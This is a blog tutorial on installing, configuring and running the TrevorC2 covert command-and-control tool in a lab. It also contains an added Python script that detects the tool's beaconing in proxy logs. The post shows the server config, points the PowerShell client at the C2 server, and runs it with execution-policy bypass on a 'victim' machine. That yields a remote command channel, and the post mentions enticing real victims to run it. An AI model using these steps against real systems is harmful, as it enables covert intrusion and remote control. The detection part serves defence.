An Introduction to TrevorC2

I enjoy playing with new tools, and one that I’m fully aware of but haven’t had the chance to use is Dave Kennedy’s TrevorC2.

TrevorC2 is a client/server model for masking command and control through a normally browsable website. Detection becomes much harder as time intervals are different and it does not use POST requests for data exfil. (Taken from the GitHub page)

This post is going to be a straightforward introduction to quickly installing and using the tool.

The tool can be found here: https://github.com/trustedsec/trevorc2

Installation

Installation is super simple.

Run the following from your terminal within Kali Linux.

cd /opt
git clone https://github.com/trustedsec/trevorc2.git
cd trevorc2/
pip install -r requirements.txt

Configuring the Server

Once installed, the TrevorC2 server will need to be configured.

Dave has made the trevorc2_server.py Python code very easy to understand with a comment about each configurable variable.

In my testing, I didn’t really need to change anything. It is, however, recommended that you change the encryption key.

Use whatever text editor you prefer and modify the trevorc2_server.py file as required. I would recommend changing the domain you would like to replicate and the encryption key.

# CONFIG CONSTANTS:

URL = ("https://www.google.com") # URL to clone to house a legitimate website
USER_AGENT = ("User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko")

# THIS IS WHAT PATH WE WANT TO HIT FOR CODE - THIS CAN BE WHATEVER PATH YOU WANT
ROOT_PATH_QUERY = ("/")

# THIS FLAG IS WHERE THE CLIENT WILL SUBMIT VIA URL AND QUERY STRING GET PARAMETER
SITE_PATH_QUERY = ("/images")

# THIS IS THE QUERY STRING PARAMETER USED
QUERY_STRING = ("guid=")

# STUB FOR DATA - THIS IS USED TO SLIP DATA INTO THE SITE, WANT TO CHANGE THIS SO ITS NOT STATIC
STUB = ("oldcss=")

# Turn to True for SSL support
SSL = False
CERT_FILE = "" # Your Certificate for SSL

# THIS IS OUR ENCRYPTION KEY - THIS NEEDS TO BE THE SAME ON BOTH SERVER AND CLIENT FOR APPROPRIATE DECRYPTION. RECOMMEND CHANGING THIS FROM THE DEFAULT KEY
CIPHER = ("Tr3v0rC2R0x@nd1s@w350m3#TrevorForget")
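The constants above also describe what the traffic looks like from the network side: the client polls SITE_PATH_QUERY with a GET whose QUERY_STRING parameter carries an encoded blob, the server hides its reply behind STUB in the cloned page, and the polling interval varies. The script below is an added example written for this post, not code from TrevorC2 or its author: it runs a check for that pattern over a handful of constructed proxy log lines and a constructed page body. The log format, the timestamps and the exact placement of the stub in the served HTML are assumptions; only the path, parameter and stub names come from the config shown above.

```python
"""Added example: spot the request/response pattern described by the TrevorC2
server config (GET to SITE_PATH_QUERY with an opaque QUERY_STRING value at
irregular intervals, STUB-prefixed data in the page body) in web proxy logs.
Not part of TrevorC2; log format, timestamps and stub placement are assumed."""
import base64
import binascii
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote, urlsplit

# Defaults copied from the config block shown in the post.
SITE_PATH_QUERY = "/images"
QUERY_STRING = "guid="
STUB = "oldcss="

# Assumed log format: "<ISO timestamp> <client IP> <method> <URL> <status>".
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<status>\d{3})$"
)
B64_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def opaque_blob(seed: int, length: int = 48) -> str:
    """Constructed stand-in for an encrypted payload: base64 of varied bytes."""
    return base64.b64encode(bytes((seed * 37 + i * 91) % 256 for i in range(length))).decode()


# Constructed sample log (lab IPs reused from the post, timestamps made up):
# 192.168.0.8 polls /images?guid=<blob> at irregular intervals (12 s, then 7 s);
# 192.168.0.5 fetches a real image and sends a short, ordinary guid value.
SAMPLE_LOG = "\n".join([
    "2019-01-10T10:00:00 192.168.0.8 GET http://192.168.0.16/ 200",
    f"2019-01-10T10:00:07 192.168.0.8 GET http://192.168.0.16/images?guid={opaque_blob(1)} 200",
    f"2019-01-10T10:00:19 192.168.0.8 GET http://192.168.0.16/images?guid={opaque_blob(2)} 200",
    f"2019-01-10T10:00:26 192.168.0.8 GET http://192.168.0.16/images?guid={opaque_blob(3)} 200",
    "2019-01-10T10:00:03 192.168.0.5 GET http://192.168.0.16/images/logo.png 200",
    "2019-01-10T10:00:04 192.168.0.5 GET http://192.168.0.16/images?guid=1234 200",
])

# Constructed response body; where the real server places the stub is assumed.
SAMPLE_PAGE = f"<html><head><!-- {STUB}{opaque_blob(9)} --></head><body>cloned page</body></html>"


def parse_line(line: str):
    """Split one log line into a dict, or return None for lines that do not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.fromisoformat(rec["ts"])
    return rec


def suspicious_query_value(url: str, min_len: int = 32):
    """Return the guid value when the request hits SITE_PATH_QUERY with a long,
    well-formed base64 blob; otherwise None (wrong path, short or non-base64)."""
    parts = urlsplit(url)
    if parts.path != SITE_PATH_QUERY:
        return None
    for pair in parts.query.split("&"):
        if not pair.startswith(QUERY_STRING):
            continue
        value = unquote(pair[len(QUERY_STRING):])  # undo %2B etc., keep '+' as-is
        if len(value) >= min_len and B64_RE.match(value):
            try:
                base64.b64decode(value, validate=True)
            except (binascii.Error, ValueError):
                continue
            return value
    return None


def find_beacons(log_text: str, min_hits: int = 3):
    """Group suspicious GETs per client and report hit count, the gaps between
    hits in seconds, and whether those gaps vary (the jitter the post mentions)."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["method"] != "GET":
            continue
        blob = suspicious_query_value(rec["url"])
        if blob:
            hits[rec["client"]].append((rec["ts"], len(blob)))
    report = {}
    for client, events in hits.items():
        if len(events) < min_hits:
            continue
        events.sort()
        intervals = [int((b[0] - a[0]).total_seconds()) for a, b in zip(events, events[1:])]
        report[client] = {"hits": len(events), "intervals": intervals,
                          "jittered": len(set(intervals)) > 1}
    return report


def find_stub_payloads(html: str):
    """Return base64-looking blobs that directly follow STUB in a page body."""
    pattern = re.escape(STUB) + r"([A-Za-z0-9+/]{16,}={0,2})"
    return [m.group(1) for m in re.finditer(pattern, html)]


if __name__ == "__main__":
    for client, info in find_beacons(SAMPLE_LOG).items():
        print(f"{client}: {info['hits']} polls, intervals {info['intervals']}, jittered={info['jittered']}")
    print("stub payloads in page:", find_stub_payloads(SAMPLE_PAGE))
```

Because the values are encrypted, the check keys on shape rather than content: a repeated GET to a fixed path whose single parameter is an unusually long, valid base64 string, from the same client, with gaps that are not constant. The response-side check simply looks for the stub string followed by an encoded run, which is only useful if the operator left STUB at its default, so treat both as starting points to tune against your own proxy data rather than as a signature.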

Configuring the Client

All I had to modify within the trevorc2_client.ps1 code was the $SITE_URL variable. This is used to specify the URL/IP Address of the TrevorC2 server listening for connections.

nano trevorc2_client.ps1

$SITE_URL = "http://192.168.0.16"

Also modify the $CIPHER variable to match the one within the trevorc2_server.py file if you have changed it.

Starting the Server

Once the server and client files are configured, we’re going to start the server and start receiving agents.

Run the following to start the server:

python trevorc2_server.py

TrevorC2 - Legitimate Website Covert Channel
Written by: David Kennedy (@HackingDave)
https://www.trustedsec.com
[*] Cloning website: https://www.google.com
[*] Site cloned successfully.
[*] Starting Trevor C2 Server...
[*] Next, enter the command you want the victim to execute.
[*] Client uses random intervals, this may take a few.
[*] Type help for usage. Example commands, list, interact.

The server is running and now listening for connections (agents). As always, I’d recommend running the help command to understand what functionality you have.

Gaining a Shell

In reality, you would entice the victim to run the following code in some way. However, for this introduction, I will simply run the trevorc2_client.ps1 file on the victim machine.

C:\Users\IEUser\Desktop>powershell -ep bypass
Windows PowerShell
Copyright (C) 2009 Microsoft Corporation. All rights reserved.

PS C:\Users\IEUser\Desktop> . .\trevorc2_client.ps1

As shown on the server side of things, we have an agent to interact with.

trevorc2>
*** Received connection from 192.168.0.8 and hostname IEWIN7 for TrevorC2.

IEWIN7:trevorc2>ipconfig
[*] Waiting for command to be executed, be patient, results will be displayed here...
[*] Received response back from client...
=-=-=-=-=-=-=-=-=-=-=
(HOSTNAME: IEWIN7
CLIENT: 192.168.0.8)

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : 
 Link-local IPv6 Address . . . . . : fe80::80ac:4126:fa58:1b81%10
 IPv4 Address. . . . . . . . . . . : 192.168.0.8
 Subnet Mask . . . . . . . . . . . : 255.255.255.0
 Default Gateway . . . . . . . . . : 192.168.0.1

Hopefully this gets you started. Huge thanks to Dave Kennedy for developing this awesome tool. Give him a follow if you don’t already (@HackingDave).

@5ub34x